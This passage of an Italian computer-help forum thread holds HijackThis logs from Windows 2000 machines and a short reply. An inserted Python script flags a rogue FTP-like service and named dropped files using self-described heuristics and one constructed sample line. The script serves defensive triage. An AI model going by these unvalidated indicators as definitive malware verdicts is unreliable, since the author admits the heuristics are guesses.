O17 - HKLM\System\CCS\Services\Tcpip\..\{A29A4F37-B20F-413E-8D50-DBF4991421AE}: NameServer = 172.20.10.19,172.20.10.3
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: SearchList = ********
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: SearchList = ********
O23 - Service: Comando remoto iSeries Access per Windows (Cwbrxd) - IBM Corporation - C:\WINNT\CWBRXD.EXE
O23 - Service: Servizio amministrativo di Gestione disco logico (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Programmi\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: McAfee Framework Service (McAfeeFramework) - Unknown owner - C:\Programmi\McAfee\Common Framework\FrameworkService.exe" /ServiceStart (file missing)
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Programmi\McAfee\VirusScan Enterprise\Mcshield.exe
O23 - Service: McAfee Task Manager (McTaskManager) - McAfee, Inc. - C:\Programmi\McAfee\VirusScan Enterprise\VsTskMgr.exe
O23 - Service: Prevx Agent (PREVXAgent) - Unknown owner - C:\Programmi\Prevx1\PXAgent.exe" -f (file missing)
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Programmi\RealVNC\VNC4\WinVNC4.exe" -service (file missing)


Client 2:

Logfile of HijackThis v1.99.1
Scan saved at 12.13.25, on 09/05/2007
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\Programmi\IVT Corporation\BlueSoleil\BTNtService.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\hidserv.exe
C:\Programmi\Network Associates\Common Framework\FrameworkService.exe
C:\Programmi\Network Associates\VirusScan\VsTskMgr.exe
C:\Programmi\Prevx1\PXAgent.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\Programmi\Analog Devices\SoundMAX\spkrmon.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\Programmi\RealVNC\VNC4\WinVNC4.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\Explorer.EXE
C:\Documents and Settings\All Users\Dati applicazioni\Skype\Plugins\Plugins\1163D2B46CC742E5A3CC9E4157887751\TalkAndWrite.exe
C:\Programmi\Nokia\Nokia PC Suite 6\LaunchApplication.exe
C:\Programmi\Prevx1\PXConsole.exe
C:\Programmi\MSN Messenger\MsnMsgr.Exe
C:\Programmi\Google\Google Talk\googletalk.exe
C:\Programmi\IVT Corporation\BlueSoleil\BlueSoleil.exe
C:\Lotus\Notes\NLNOTES.EXE
C:\Lotus\Notes\naldaemn.EXE
C:\WINNT\system32\wuauclt.exe
C:\Programmi\Mozilla Firefox\firefox.exe
C:\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = \blank.htm
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Collegamenti
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programmi\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Malicious Scripts Scanner - {55EA1964-F5E4-4D6A-B9B2-125B37655FCB} - C:\Documents and Settings\All Users\Dati applicazioni\Prevx\pxbho.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programmi\Java\jre1.5.0_06\bin\ssv.dll
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [IgfxTray] C:\WINNT\System32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINNT\System32\hkcmd.exe
O4 - HKLM\..\Run: [ShStatEXE] "C:\Programmi\Network Associates\VirusScan\SHSTAT.EXE" /STANDALONE
O4 - HKLM\..\Run: [McAfeeUpdaterUI] "C:\Programmi\Network Associates\Common Framework\UpdaterUI.exe" /StartedFromRunKey
O4 - HKLM\..\Run: [Network Associates Error Reporting Service] "C:\Programmi\File comuni\Network Associates\TalkBack\TBMon.exe"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Programmi\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Programmi\Java\jre1.5.0_06\bin\jusched.exe
O4 - HKLM\..\Run: [TalkAndWrite] C:\Documents and Settings\All Users\Dati applicazioni\Skype\Plugins\Plugins\1163D2B46CC742E5A3CC9E4157887751\TalkAndWrite.exe /run
O4 - HKLM\..\Run: [PCSuiteTrayApplication] C:\Programmi\Nokia\Nokia PC Suite 6\LaunchApplication.exe -startup
O4 - HKLM\..\Run: [aol] "C:\Programmi\AOL\Active Virus Shield\avp.exe"
O4 - HKLM\..\Run: [PrevxOne] "C:\Programmi\Prevx1\PXConsole.exe"
O4 - HKCU\..\Run: [Skype] "C:\Programmi\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [MsnMsgr] "C:\Programmi\MSN Messenger\MsnMsgr.Exe" /background
O4 - HKCU\..\Run: [VoipStunt] "C:\programmi\voipstunt.com\voipstunt\voipstunt.exe" -nosplash -minimized
O4 - HKCU\..\Run: [skypho.exe] "C:\Programmi\skypho\skypho\skypho.exe"
O4 - HKCU\..\Run: [updateMgr] "C:\Programmi\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe" AcRdB7_0_8 -reboot 1
O4 - HKCU\..\Run: [googletalk] "C:\Programmi\Google\Google Talk\googletalk.exe" /autostart
O4 - Global Startup: as400.lnk = C:\as400.bat
O4 - Global Startup: BlueSoleil.lnk = C:\Programmi\IVT Corporation\BlueSoleil\BlueSoleil.exe
O4 - Global Startup: CopiaMdw2000.lnk = ProtAcc\CopiaMdw2000.bat
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmi\Java\jre1.5.0_06\bin\ssv.dll
O16 - DPF: {00B71CFB-6864-4346-A978-C0A14556272C} (Checkers Class) - http://messenger.zone.msn.com/binary/ms ... b31267.cab
O16 - DPF: {14B87622-7E19-4EA8-93B3-97215F77A6BC} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/Me ... b31267.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupda ... 8313685359
O16 - DPF: {7F8C8173-AD80-4807-AA75-5672F22B4582} (ICSScanner Class) - http://download.zonelabs.com/bin/promot ... 371050.cab
O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/Me ... b31267.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (ZoneIntro Class) - http://messenger.zone.msn.com/binary/ZI ... b47946.cab
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\System\CCS\Services\Tcpip\..\{3540B02A-0387-4EA5-8CD9-AA881023FF89}: Domain = ********
O17 - HKLM\System\CCS\Services\Tcpip\..\{3540B02A-0387-4EA5-8CD9-AA881023FF89}: NameServer = 172.20.10.19,172.20.10.3
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: SearchList = ********
O17 - HKLM\System\CS1\Services\Tcpip\..\{3540B02A-0387-4EA5-8CD9-AA881023FF89}: Domain = ********
O17 - HKLM\System\CS1\Services\Tcpip\..\{3540B02A-0387-4EA5-8CD9-AA881023FF89}: NameServer = 172.20.10.19,172.20.10.3
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: Domain = gio2000.loc
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: SearchList = ********
O17 - HKLM\System\CS2\Services\Tcpip\..\{3540B02A-0387-4EA5-8CD9-AA881023FF89}: Domain = ********
O17 - HKLM\System\CS2\Services\Tcpip\..\{3540B02A-0387-4EA5-8CD9-AA881023FF89}: NameServer = 172.20.10.19,172.20.10.3
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: SearchList = ********
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\FILECO~1\Skype\SKYPE4~1.DLL
O20 - Winlogon Notify: igfxcui - C:\WINNT\SYSTEM32\igfxsrvc.dll
O20 - Winlogon Notify: klogon - C:\WINNT\system32\klogon.dll
O23 - Service: Active Virus Shield (AVP) - Unknown owner - C:\Programmi\AOL\Active Virus Shield\avp.exe" -r (file missing)
O23 - Service: BlueSoleil Hid Service - Unknown owner - C:\Programmi\IVT Corporation\BlueSoleil\BTNtService.exe
O23 - Service: Comando remoto iSeries Access per Windows (Cwbrxd) - IBM Corporation - C:\WINNT\CWBRXD.EXE
O23 - Service: Servizio amministrativo di Gestione disco logico (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Programmi\File comuni\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: Servizio di framework di McAfee (McAfeeFramework) - Network Associates, Inc. - C:\Programmi\Network Associates\Common Framework\FrameworkService.exe
O23 - Service: Network Associates McShield (McShield) - Network Associates, Inc. - C:\Programmi\Network Associates\VirusScan\Mcshield.exe
O23 - Service: Network Associates Task Manager (McTaskManager) - Network Associates, Inc. - C:\Programmi\Network Associates\VirusScan\VsTskMgr.exe
O23 - Service: Prevx Agent (PREVXAgent) - Unknown owner - C:\Programmi\Prevx1\PXAgent.exe" -f (file missing)
O23 - Service: ServiceLayer - Nokia. - C:\Programmi\PC Connectivity Solution\ServiceLayer.exe
O23 - Service: spkrmon - Unknown owner - C:\Programmi\Analog Devices\SoundMAX\spkrmon.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Programmi\RealVNC\VNC4\WinVNC4.exe" -service (file missing)


Does anyone have any ideas? :undecided:
Thanks a lot.
Padrino
padrino
Newbie

Posts: 7
Joined: 29/08/06 01:12
Location: Messina
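Reading three HijackThis logs by eye for one rogue service is error-prone, so here is an added example (my code, not the poster's and not part of HijackThis) that parses O23 service lines and flags a service when it matches the indicators named in the first post (the "Microsoft windows FTPd" service, Updtftpini.exe, 84785_2pac.exe), when its binary sits in a staging directory such as system32\dllcache, or when it carries a Microsoft/Windows-style display name but is neither owned by Microsoft nor running directly out of %SystemRoot%\system32. The sample input takes four lines verbatim from the server log above; the fifth, showing how the rogue service would appear, is constructed, because the thread names the service and the file but never shows an O23 line for them. The heuristics are assumptions of mine, tuned to this log.

```python
"""Triage HijackThis O23 (service) lines for the indicators named in this thread."""
import re

# O23 - Service: <display name> (<service name>) - <owner> - <image path> [(file missing)]
O23_RE = re.compile(
    r"^O23 - Service: (?P<display>.+?)(?: \((?P<short>[^()]+)\))? - "
    r"(?P<owner>.+?) - (?P<path>[A-Za-z]:\\.*)$"
)
EXE_RE = re.compile(r"(.+?\.exe)\b", re.I)
# Binary directly in %SystemRoot%\system32 (no sub-directory), where svchost/lsass/services live.
SYSTEM_ROOT_BIN = re.compile(r"\\(windows|winnt)\\system32\\[^\\]+$", re.I)
# Directories a dropper likes for staging; dllcache is where the thread's Updtftpini.exe turned up.
STAGING_DIR = re.compile(r"\\(dllcache|temp|tmp|recycler)\\", re.I)
MS_STYLE_NAME = re.compile(r"\b(microsoft|windows)\b", re.I)
MS_OWNERS = {"microsoft corporation"}
# Indicators quoted in the first post: the rogue service name and the two dropped files.
IOC_SERVICES = {"microsoft windows ftpd"}
IOC_FILES = {"updtftpini.exe", "84785_2pac.exe"}


def parse_o23(line):
    """Split one O23 line into display/short name, owner, image path and the binary it points at."""
    m = O23_RE.match(line.strip())
    if not m:
        return None
    svc = m.groupdict()
    path = svc["path"]
    svc["file_missing"] = path.endswith("(file missing)")
    path = path.replace("(file missing)", "").strip()
    # HijackThis prints ImagePath arguments after a stray quote (`...\PXAgent.exe" -f`);
    # keep only the executable itself.
    exe = EXE_RE.match(path)
    svc["path"] = path
    svc["exe"] = exe.group(1) if exe else path.split('"')[0].strip()
    return svc


def triage_service(svc):
    """Return the list of reasons (possibly empty) for which this service deserves a look."""
    reasons = []
    exe_name = svc["exe"].rsplit("\\", 1)[-1].lower()
    if svc["display"].lower() in IOC_SERVICES or exe_name in IOC_FILES:
        reasons.append("matches an indicator quoted in the thread")
    if (MS_STYLE_NAME.search(svc["display"])
            and svc["owner"].lower() not in MS_OWNERS
            and not SYSTEM_ROOT_BIN.search(svc["exe"])):
        reasons.append("Microsoft/Windows-style name, non-Microsoft owner, binary outside system32")
    if STAGING_DIR.search(svc["exe"]):
        reasons.append("binary lives in a staging directory (dllcache/temp)")
    return reasons


def triage_log(lines):
    """Return (display name, binary, reasons) for every O23 line that raises at least one flag."""
    flagged = []
    for line in lines:
        svc = parse_o23(line)
        if svc is None:
            continue
        reasons = triage_service(svc)
        if reasons:
            flagged.append((svc["display"], svc["exe"], reasons))
    return flagged


# Four lines copied from the server log above, plus ONE CONSTRUCTED line (the last) showing how
# the rogue service named in the first post would be listed.
SAMPLE_O23 = [
    r"O23 - Service: Servizio Pubblicazione FTP (MSFtpsvc) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\system32\inetsrv\inetinfo.exe (file missing)",
    r"O23 - Service: Ora di Windows (W32Time) - Unknown owner - C:\Documents and Settings\Administrator.GIO2000\WINDOWS\System32\svchost.exe (file missing)",
    r'O23 - Service: Prevx Agent (PREVXAgent) - Unknown owner - C:\Programmi\Prevx1\PXAgent.exe" -f (file missing)',
    r'O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Programmi\RealVNC\VNC4\WinVNC4.exe" -service (file missing)',
    r"O23 - Service: Microsoft windows FTPd - Unknown owner - C:\WINDOWS\system32\dllcache\Updtftpini.exe",  # constructed
]

if __name__ == "__main__":
    for display, exe, reasons in triage_log(SAMPLE_O23):
        print(display, "->", exe, reasons)
```

Note what is deliberately not flagged: the real IIS FTP service (MSFtpsvc) and the many "Unknown owner ... (file missing)" entries, which in this log are ordinary Windows services whose binaries HijackThis simply could not attribute; "Unknown owner" alone is far too noisy to act on here, whereas a Microsoft-sounding name pointing into dllcache is not.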

Post by Mikele46 » 09/05/07 11:53

Well, to check the log go to http://www.hijackthis.de/it because you have some applications I don't recognize and many entries to remove.... then.... I don't know whether it helps, but you can check in msconfig (type it into Run) whether there are unknown programs that run automatically; then I recommend a scan with Spybot.
Mikele46
Senior User

Posts: 521
Joined: 20/08/06 15:16
Location: Napoli
